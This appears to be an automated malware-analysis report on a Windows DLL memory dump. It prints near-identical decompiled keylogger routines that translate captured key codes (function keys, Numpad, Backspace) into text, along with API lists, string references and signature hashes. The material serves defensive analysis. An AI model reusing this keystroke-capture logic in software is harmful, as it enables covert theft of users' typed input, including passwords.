KeyDelBackspace, xrefs: 10007722, 10007886

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Unicode$Virtual$AllocString
String ID: KeyDelBackspace$Numpad$[F1]
API String ID: 783433895-641059523
Opcode ID: 64e4913f7c88e1f6cf871e329d884627882b20964cb17dd16a0edd8879f2af3b
Instruction ID: 59f01fadd6c1986280f76c7ec94e26e07e8e794a631d308a07038ad1fc5cdc92
Opcode Fuzzy Hash: 64e4913f7c88e1f6cf871e329d884627882b20964cb17dd16a0edd8879f2af3b
Instruction Fuzzy Hash: 4231C0B8F042545BF722DB658C45B9F73A9FB882C0F50C0A5F5489720ECA78EE49CB61

Uniqueness

Uniqueness Score: -1.00%

Function 100073A9, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 97
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E100073A9(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
				int _t52;
				int _t56;
				intOrPtr* _t76;
				intOrPtr _t88;
				struct HKL__* _t104;
				struct HKL__* _t108;
				struct HKL__* _t112;
				int _t113;
				int _t115;
				void* _t118;
				int _t129;

				_t104 = __edi;
				_t76 = __ebx;
				E100037AC(__ebx, L"[F10]");
				E10003A34( *__ebx, 0);
				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
					E100037AC(__ebx, L"KeyDelBackspace");
				}
				 *((char*)(_t118 - 1)) = E10006D04();
				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
				if(_t113 <= 0) {
					__eflags = _t113;
					if(_t113 < 0) {
						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
						_t108 = _t104;
						_t115 = _t113;
						E100050D8();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t115;
						if(_t115 < 0) {
							do {
								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
								__eflags = _t52;
							} while (_t52 < 0);
						}
					}
				} else {
					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
					_t112 = _t104;
					E10003A34( *_t76, 0);
					if(0 == 0) {
						E100038E0(_t76, 0x80, _t118 - 0x30c);
						_t128 =  *((char*)(_t118 - 1));
						if( *((char*)(_t118 - 1)) == 0) {
							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
						} else {
							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
						}
					}
					_t56 =  *(_t118 - 0x20c);
					_t129 = _t56;
					if(_t129 != 0) {
						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
					}
					E100050D8();
				}
				E10003A34( *_t76, L"KeyDelBackspace");
				if(_t129 == 0) {
					E10003770(_t76);
				}
				_pop(_t88);
				 *[fs:eax] = _t88;
				_push(E100078BE);
				return E10003788(_t118 - 0x414, 2);
			}

0x100073a9
0x100073a9
0x100073b0
0x100076f0
0x100076f5
0x10007727
0x10007727
0x10007731
0x10007759
0x1000775d
0x1000780e
0x10007810
0x10007816
0x1000781f
0x10007836
0x10007838
0x10007839
0x10007845
0x1000784e
0x10007853
0x10007855
0x10007857
0x10007879
0x10007880
0x10007880
0x10007857
0x10007855
0x10007763
0x10007774
0x10007776
0x1000777b
0x10007780
0x1000778f
0x10007794
0x10007798
0x100077be
0x100077cb
0x1000779a
0x100077a2
0x100077af
0x100077af
0x10007798
0x100077d0
0x100077d6
0x100077d8
0x100077f8
0x100077f8
0x10007807
0x10007807
0x1000788b
0x10007890
0x10007894
0x10007894
0x1000789b
0x1000789e
0x100078a1
0x100078b6

APIs

Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879

Strings

Numpad, xrefs: 10007712
[F10], xrefs: 100073AB
KeyDelBackspace, xrefs: 10007722, 10007886

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Unicode$Virtual$AllocString
String ID: KeyDelBackspace$Numpad$[F10]
API String ID: 783433895-364933614
Opcode ID: 9f166c72ca3fb3b12034e07594ffb6c51ca785a8f37ad7b268c171178664f28e
Instruction ID: 4cdd846a56abf61bb4e4c6fde4f6555a2bc56d43735489f94f76061a9b7946e9
Opcode Fuzzy Hash: 9f166c72ca3fb3b12034e07594ffb6c51ca785a8f37ad7b268c171178664f28e
Instruction Fuzzy Hash: 5931C0B8F042545BF722DB658C45B9F73A9FB882C0F50C0A5F6489720ECA78EE45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 100073BA, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 97
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E100073BA(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
				int _t52;
				int _t56;
				intOrPtr* _t76;
				intOrPtr _t88;
				struct HKL__* _t104;
				struct HKL__* _t108;
				struct HKL__* _t112;
				int _t113;
				int _t115;
				void* _t118;
				int _t129;

				_t104 = __edi;
				_t76 = __ebx;
				E100037AC(__ebx, L"[F11]");
				E10003A34( *__ebx, 0);
				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
					E100037AC(__ebx, L"KeyDelBackspace");
				}
				 *((char*)(_t118 - 1)) = E10006D04();
				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
				if(_t113 <= 0) {
					__eflags = _t113;
					if(_t113 < 0) {
						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
						_t108 = _t104;
						_t115 = _t113;
						E100050D8();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t115;
						if(_t115 < 0) {
							do {
								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
								__eflags = _t52;
							} while (_t52 < 0);
						}
					}
				} else {
					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
					_t112 = _t104;
					E10003A34( *_t76, 0);
					if(0 == 0) {
						E100038E0(_t76, 0x80, _t118 - 0x30c);
						_t128 =  *((char*)(_t118 - 1));
						if( *((char*)(_t118 - 1)) == 0) {
							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
						} else {
							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
						}
					}
					_t56 =  *(_t118 - 0x20c);
					_t129 = _t56;
					if(_t129 != 0) {
						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
					}
					E100050D8();
				}
				E10003A34( *_t76, L"KeyDelBackspace");
				if(_t129 == 0) {
					E10003770(_t76);
				}
				_pop(_t88);
				 *[fs:eax] = _t88;
				_push(E100078BE);
				return E10003788(_t118 - 0x414, 2);
			}

0x100073ba
0x100073ba
0x100073c1
0x100076f0
0x100076f5
0x10007727
0x10007727
0x10007731
0x10007759
0x1000775d
0x1000780e
0x10007810
0x10007816
0x1000781f
0x10007836
0x10007838
0x10007839
0x10007845
0x1000784e
0x10007853
0x10007855
0x10007857
0x10007879
0x10007880
0x10007880
0x10007857
0x10007855
0x10007763
0x10007774
0x10007776
0x1000777b
0x10007780
0x1000778f
0x10007794
0x10007798
0x100077be
0x100077cb
0x1000779a
0x100077a2
0x100077af
0x100077af
0x10007798
0x100077d0
0x100077d6
0x100077d8
0x100077f8
0x100077f8
0x10007807
0x10007807
0x1000788b
0x10007890
0x10007894
0x10007894
0x1000789b
0x1000789e
0x100078a1
0x100078b6

APIs

Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879

Strings

[F11], xrefs: 100073BC
Numpad, xrefs: 10007712
KeyDelBackspace, xrefs: 10007722, 10007886

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Unicode$Virtual$AllocString
String ID: KeyDelBackspace$Numpad$[F11]
API String ID: 783433895-215695535
Opcode ID: ea95564da9a66dc7470533b2786a86451c8797b2579bdf17ac1d53f73ee1c4ab
Instruction ID: ab767402ff5a0ef776935679cf191d8ea99af36a4d9809d38744d6a7013e6ded
Opcode Fuzzy Hash: ea95564da9a66dc7470533b2786a86451c8797b2579bdf17ac1d53f73ee1c4ab
Instruction Fuzzy Hash: 8C31C0B8F042545BF722DB658C85B9F73A9FB882C0F50C0A5F5489720ECA78EE45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 100073CB, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 97
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E100073CB(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
				int _t52;
				int _t56;
				intOrPtr* _t76;
				intOrPtr _t88;
				struct HKL__* _t104;
				struct HKL__* _t108;
				struct HKL__* _t112;
				int _t113;
				int _t115;
				void* _t118;
				int _t129;

				_t104 = __edi;
				_t76 = __ebx;
				E100037AC(__ebx, L"[F12]");
				E10003A34( *__ebx, 0);
				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
					E100037AC(__ebx, L"KeyDelBackspace");
				}
				 *((char*)(_t118 - 1)) = E10006D04();
				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
				if(_t113 <= 0) {
					__eflags = _t113;
					if(_t113 < 0) {
						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
						_t108 = _t104;
						_t115 = _t113;
						E100050D8();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t115;
						if(_t115 < 0) {
							do {
								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
								__eflags = _t52;
							} while (_t52 < 0);
						}
					}
				} else {
					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
					_t112 = _t104;
					E10003A34( *_t76, 0);
					if(0 == 0) {
						E100038E0(_t76, 0x80, _t118 - 0x30c);
						_t128 =  *((char*)(_t118 - 1));
						if( *((char*)(_t118 - 1)) == 0) {
							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
						} else {
							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
						}
					}
					_t56 =  *(_t118 - 0x20c);
					_t129 = _t56;
					if(_t129 != 0) {
						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
					}
					E100050D8();
				}
				E10003A34( *_t76, L"KeyDelBackspace");
				if(_t129 == 0) {
					E10003770(_t76);
				}
				_pop(_t88);
				 *[fs:eax] = _t88;
				_push(E100078BE);
				return E10003788(_t118 - 0x414, 2);
			}

0x100073cb
0x100073cb
0x100073d2
0x100076f0
0x100076f5
0x10007727
0x10007727
0x10007731
0x10007759
0x1000775d
0x1000780e
0x10007810
0x10007816
0x1000781f
0x10007836
0x10007838
0x10007839
0x10007845
0x1000784e
0x10007853
0x10007855
0x10007857
0x10007879
0x10007880
0x10007880
0x10007857
0x10007855
0x10007763
0x10007774
0x10007776
0x1000777b
0x10007780
0x1000778f
0x10007794
0x10007798
0x100077be
0x100077cb
0x1000779a
0x100077a2
0x100077af
0x100077af
0x10007798
0x100077d0
0x100077d6
0x100077d8
0x100077f8
0x100077f8
0x10007807
0x10007807
0x1000788b
0x10007890
0x10007894
0x10007894
0x1000789b
0x1000789e
0x100078a1
0x100078b6

APIs

Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879

Strings

[F12], xrefs: 100073CD
Numpad, xrefs: 10007712
KeyDelBackspace, xrefs: 10007722, 10007886

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Unicode$Virtual$AllocString
String ID: KeyDelBackspace$Numpad$[F12]
API String ID: 783433895-670438252
Opcode ID: 0c12ee716339a32b888c429408e51ea20923bef0f46d25eede9ce57d1a8b8c38
Instruction ID: 79f6c1988ebe657b0a26f0600b493b9fd807da5f9602e5f532d1718735006c02
Opcode Fuzzy Hash: 0c12ee716339a32b888c429408e51ea20923bef0f46d25eede9ce57d1a8b8c38
Instruction Fuzzy Hash: 0D31C0B8F042545BF722DB658C45B9F73A9FB882C0F50C0A5F5489720ECAB8EE45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 100073DC, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 97
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E100073DC(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
				int _t52;
				int _t56;
				intOrPtr* _t76;
				intOrPtr _t88;
				struct HKL__* _t104;
				struct HKL__* _t108;
				struct HKL__* _t112;
				int _t113;
				int _t115;
				void* _t118;
				int _t129;

				_t104 = __edi;
				_t76 = __ebx;
				E100037AC(__ebx, L"[F13]");
				E10003A34( *__ebx, 0);
				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
					E100037AC(__ebx, L"KeyDelBackspace");
				}
				 *((char*)(_t118 - 1)) = E10006D04();
				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
				if(_t113 <= 0) {
					__eflags = _t113;
					if(_t113 < 0) {
						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
						_t108 = _t104;
						_t115 = _t113;
						E100050D8();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t115;
						if(_t115 < 0) {
							do {
								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
								__eflags = _t52;
							} while (_t52 < 0);
						}
					}
				} else {
					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
					_t112 = _t104;
					E10003A34( *_t76, 0);
					if(0 == 0) {
						E100038E0(_t76, 0x80, _t118 - 0x30c);
						_t128 =  *((char*)(_t118 - 1));
						if( *((char*)(_t118 - 1)) == 0) {
							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
						} else {
							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
						}
					}
					_t56 =  *(_t118 - 0x20c);
					_t129 = _t56;
					if(_t129 != 0) {
						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
					}
					E100050D8();
				}
				E10003A34( *_t76, L"KeyDelBackspace");
				if(_t129 == 0) {
					E10003770(_t76);
				}
				_pop(_t88);
				 *[fs:eax] = _t88;
				_push(E100078BE);
				return E10003788(_t118 - 0x414, 2);
			}

0x100073dc
0x100073dc
0x100073e3
0x100076f0
0x100076f5
0x10007727
0x10007727
0x10007731
0x10007759
0x1000775d
0x1000780e
0x10007810
0x10007816
0x1000781f
0x10007836
0x10007838
0x10007839
0x10007845
0x1000784e
0x10007853
0x10007855
0x10007857
0x10007879
0x10007880
0x10007880
0x10007857
0x10007855
0x10007763
0x10007774
0x10007776
0x1000777b
0x10007780
0x1000778f
0x10007794
0x10007798
0x100077be
0x100077cb
0x1000779a
0x100077a2
0x100077af
0x100077af
0x10007798
0x100077d0
0x100077d6
0x100077d8
0x100077f8
0x100077f8
0x10007807
0x10007807
0x1000788b
0x10007890
0x10007894
0x10007894
0x1000789b
0x1000789e
0x100078a1
0x100078b6

APIs

Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879

Strings

Numpad, xrefs: 10007712
KeyDelBackspace, xrefs: 10007722, 10007886
[F13], xrefs: 100073DE

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Unicode$Virtual$AllocString
String ID: KeyDelBackspace$Numpad$[F13]
API String ID: 783433895-1055728173
Opcode ID: 55794011ea89da0739b276c20e738cabb44d155302fcc1f045d1e4b9aea512c3
Instruction ID: 7717c9acb7a48c1fd9aa5c525c440081627dfa369ae28c64501c57b8f83c06ce
Opcode Fuzzy Hash: 55794011ea89da0739b276c20e738cabb44d155302fcc1f045d1e4b9aea512c3
Instruction Fuzzy Hash: 0131C0B8F042545BF722DB658C45B9F73A9FB882C0F50C0A6F5489720ECA78EE45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 100073ED, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 97
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E100073ED(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
				int _t52;
				int _t56;
				intOrPtr* _t76;
				intOrPtr _t88;
				struct HKL__* _t104;
				struct HKL__* _t108;
				struct HKL__* _t112;
				int _t113;
				int _t115;
				void* _t118;
				int _t129;

				_t104 = __edi;
				_t76 = __ebx;
				E100037AC(__ebx, L"[F14]");
				E10003A34( *__ebx, 0);
				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
					E100037AC(__ebx, L"KeyDelBackspace");
				}
				 *((char*)(_t118 - 1)) = E10006D04();
				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
				if(_t113 <= 0) {
					__eflags = _t113;
					if(_t113 < 0) {
						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
						_t108 = _t104;
						_t115 = _t113;
						E100050D8();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t115;
						if(_t115 < 0) {
							do {
								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
								__eflags = _t52;
							} while (_t52 < 0);
						}
					}
				} else {
					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
					_t112 = _t104;
					E10003A34( *_t76, 0);
					if(0 == 0) {
						E100038E0(_t76, 0x80, _t118 - 0x30c);
						_t128 =  *((char*)(_t118 - 1));
						if( *((char*)(_t118 - 1)) == 0) {
							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
						} else {
							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
						}
					}
					_t56 =  *(_t118 - 0x20c);
					_t129 = _t56;
					if(_t129 != 0) {
						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
					}
					E100050D8();
				}
				E10003A34( *_t76, L"KeyDelBackspace");
				if(_t129 == 0) {
					E10003770(_t76);
				}
				_pop(_t88);
				 *[fs:eax] = _t88;
				_push(E100078BE);
				return E10003788(_t118 - 0x414, 2);
			}

0x100073ed
0x100073ed
0x100073f4
0x100076f0
0x100076f5
0x10007727
0x10007727
0x10007731
0x10007759
0x1000775d
0x1000780e
0x10007810
0x10007816
0x1000781f
0x10007836
0x10007838
0x10007839
0x10007845
0x1000784e
0x10007853
0x10007855
0x10007857
0x10007879
0x10007880
0x10007880
0x10007857
0x10007855
0x10007763
0x10007774
0x10007776
0x1000777b
0x10007780
0x1000778f
0x10007794
0x10007798
0x100077be
0x100077cb
0x1000779a
0x100077a2
0x100077af
0x100077af
0x10007798
0x100077d0
0x100077d6
0x100077d8
0x100077f8
0x100077f8
0x10007807
0x10007807
0x1000788b
0x10007890
0x10007894
0x10007894
0x1000789b
0x1000789e
0x100078a1
0x100078b6

APIs

Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879

Strings

Numpad, xrefs: 10007712
KeyDelBackspace, xrefs: 10007722, 10007886
[F14], xrefs: 100073EF

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Unicode$Virtual$AllocString
String ID: KeyDelBackspace$Numpad$[F14]
API String ID: 783433895-1907143914
Opcode ID: 203ad46c11f461d6459dc7cfca51af08d8e7ecda52987724564deb56dbc02e20
Instruction ID: 7a25b7b709d0a6fd19846fba783c816f7393c35fd42baf023038af521e89d6ec
Opcode Fuzzy Hash: 203ad46c11f461d6459dc7cfca51af08d8e7ecda52987724564deb56dbc02e20
Instruction Fuzzy Hash: 6831C0B8F042545BF722DB658C45B9F73A9FB882C0F50C0A5F5489720ECA78EE45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 100073FE, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 97
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E100073FE(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
				int _t52;
				int _t56;
				intOrPtr* _t76;
				intOrPtr _t88;
				struct HKL__* _t104;
				struct HKL__* _t108;
				struct HKL__* _t112;
				int _t113;
				int _t115;
				void* _t118;
				int _t129;

				_t104 = __edi;
				_t76 = __ebx;
				E100037AC(__ebx, L"[F15]");
				E10003A34( *__ebx, 0);
				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
					E100037AC(__ebx, L"KeyDelBackspace");
				}
				 *((char*)(_t118 - 1)) = E10006D04();
				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
				if(_t113 <= 0) {
					__eflags = _t113;
					if(_t113 < 0) {
						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
						_t108 = _t104;
						_t115 = _t113;
						E100050D8();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t115;
						if(_t115 < 0) {
							do {
								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
								__eflags = _t52;
							} while (_t52 < 0);
						}
					}
				} else {
